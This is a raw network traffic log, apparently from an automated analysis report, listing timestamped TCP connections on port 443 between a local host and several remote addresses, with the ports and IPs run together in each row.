                                                                                                                                                              Jan 17, 2024 17:39:19.389127970 CET44349784104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.401205063 CET44349785104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.401737928 CET49785443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:19.401767015 CET44349785104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.402153969 CET44349785104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.403738022 CET49785443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:19.403814077 CET44349785104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.403934002 CET49785443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:19.449909925 CET44349785104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.455987930 CET49785443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:19.480053902 CET49784443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:19.606889009 CET44349784104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.607026100 CET44349784104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.607111931 CET49784443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:19.608393908 CET49784443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:19.608419895 CET44349784104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.629856110 CET44349785104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.630228996 CET44349785104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.630285025 CET49785443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:19.630304098 CET44349785104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.630352020 CET44349785104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.630402088 CET49785443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:19.630752087 CET49785443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:19.630770922 CET44349785104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:19.630783081 CET49785443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:19.630816936 CET49785443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.094398022 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.094441891 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.094505072 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.094971895 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.094994068 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.301512957 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.301820040 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.301839113 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.302218914 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.302536964 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.302623034 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.302804947 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.302881956 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.302910089 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.303006887 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.303019047 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.504931927 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505040884 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505072117 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505086899 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.505104065 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505140066 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505153894 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.505163908 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505203962 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505229950 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505251884 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.505259037 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505314112 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.505373001 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505409002 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505429983 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.505435944 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505479097 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505507946 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.505844116 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.505844116 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.505851984 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.506100893 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.506213903 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.506441116 CET49789443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:20.506457090 CET44349789104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.537156105 CET49792443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:20.537230968 CET44349792104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.537316084 CET49792443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:20.537794113 CET49792443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:20.537822962 CET44349792104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.725805044 CET44349792104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.726078987 CET49792443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:20.726104975 CET44349792104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.727222919 CET44349792104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.727581978 CET49792443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:20.727721930 CET49792443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:20.727761030 CET44349792104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.770947933 CET49792443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:20.947561979 CET44349792104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.947876930 CET44349792104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:20.947954893 CET49792443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:20.948163033 CET49792443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:20.948206902 CET44349792104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.486219883 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.486270905 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.486349106 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.487032890 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.487045050 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.669281960 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.669614077 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.669640064 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.669996977 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.670392990 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.670455933 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.670670033 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.670670033 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.670696974 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.670747042 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.670762062 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.670764923 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.670819044 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.889487982 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.889553070 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.889581919 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.889662981 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.889689922 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.889707088 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.889904976 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.890693903 CET49794443192.168.2.4104.17.2.184
                                                                                                                                                              Jan 17, 2024 17:39:29.890728951 CET44349794104.17.2.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.897752047 CET49795443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:29.897789955 CET44349795172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.897859097 CET49795443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:29.898170948 CET49795443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:29.898181915 CET44349795172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.899095058 CET49796443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:29.899292946 CET44349796104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:29.899389029 CET49796443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:29.899631023 CET49796443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:29.899713039 CET44349796104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.081676006 CET44349796104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.082061052 CET49796443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:30.082075119 CET44349796104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.082426071 CET44349796104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.085340023 CET44349795172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.085850954 CET49796443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:30.085951090 CET44349796104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.089497089 CET49795443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.089520931 CET44349795172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.089963913 CET49796443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:30.089993954 CET44349795172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.090398073 CET49795443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.090459108 CET44349795172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.091003895 CET49795443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.091020107 CET49795443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.091032982 CET44349795172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.133908987 CET44349796104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.304920912 CET44349796104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.305018902 CET44349796104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.305303097 CET49796443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:30.305634022 CET49796443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:30.305655003 CET44349796104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.909615040 CET44349795172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.909696102 CET44349795172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.909754038 CET49795443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.910264015 CET49795443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.910284996 CET44349795172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.926652908 CET49797443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.926693916 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.926770926 CET49797443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.927222967 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.927253962 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.927309990 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.927748919 CET49797443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.927761078 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.928757906 CET49799443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:30.928800106 CET44349799151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.928855896 CET49799443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:30.929276943 CET49800443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:30.929322958 CET44349800104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.929374933 CET49800443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:30.929534912 CET49799443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:30.929547071 CET44349799151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.929910898 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:30.929934025 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:30.930047035 CET49800443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:30.930063009 CET44349800104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.114905119 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.121365070 CET49797443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.121381998 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.121865988 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.122893095 CET49797443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.122978926 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.123089075 CET49797443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.131500006 CET44349800104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.131844044 CET49800443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:31.131869078 CET44349800104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.132213116 CET44349800104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.132555962 CET49800443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:31.132613897 CET44349800104.17.3.184192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.135289907 CET44349799151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.135478973 CET49799443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:31.135504007 CET44349799151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.135848045 CET44349799151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.136122942 CET49799443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:31.136181116 CET44349799151.101.193.229192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.140700102 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.140899897 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.140925884 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.141282082 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.141526937 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.141601086 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.169899940 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.183008909 CET49800443192.168.2.4104.17.3.184
                                                                                                                                                              Jan 17, 2024 17:39:31.183031082 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.183031082 CET49799443192.168.2.4151.101.193.229
                                                                                                                                                              Jan 17, 2024 17:39:31.290802002 CET49801443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.290888071 CET44349801172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.290982008 CET49801443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.291301012 CET49801443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.291337967 CET44349801172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.483251095 CET44349801172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.483561039 CET49801443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.483592987 CET44349801172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.484658003 CET44349801172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.484730959 CET49801443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.485079050 CET49801443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.485140085 CET44349801172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.485414028 CET49801443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.485421896 CET44349801172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.530874968 CET49801443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.983726025 CET44349801172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.983809948 CET44349801172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:31.983875036 CET49801443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.984508991 CET49801443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:31.984527111 CET44349801172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.082640886 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.082693100 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.082715988 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.082740068 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.082775116 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.082777023 CET49797443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.082803011 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.082815886 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.082818031 CET49797443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.082853079 CET49797443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.082931042 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.082993031 CET49797443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.089008093 CET49797443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.089030027 CET44349797172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.137089014 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.137134075 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.137229919 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.137675047 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.138197899 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.138211012 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.177913904 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.330530882 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.330836058 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.330862045 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.331542969 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.331865072 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.331943035 CET44349802172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.373107910 CET49802443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.470606089 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.470652103 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.470674038 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.470701933 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.470730066 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.470803022 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.470841885 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.470865011 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.470921993 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.470938921 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.471033096 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.471127987 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.471179008 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.471193075 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.471244097 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.471301079 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.471446037 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.471493959 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.471506119 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.471568108 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.471601009 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.471616983 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.471631050 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.472115993 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.472170115 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.472173929 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.472188950 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.472219944 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.472296000 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.472352028 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.472363949 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.472701073 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.472735882 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.472781897 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.472784042 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.472796917 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.472831011 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.472898960 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.472943068 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.472955942 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.473120928 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.473167896 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.473170996 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.473185062 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.473335028 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.473382950 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.473396063 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.473445892 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.473483086 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.473556042 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.473601103 CET49798443192.168.2.4172.67.148.131
                                                                                                                                                              Jan 17, 2024 17:39:32.473613977 CET44349798172.67.148.131192.168.2.4
                                                                                                                                                              Jan 17, 2024 17:39:32.474083900 CET44349798172.67.148.131192.168.2.4
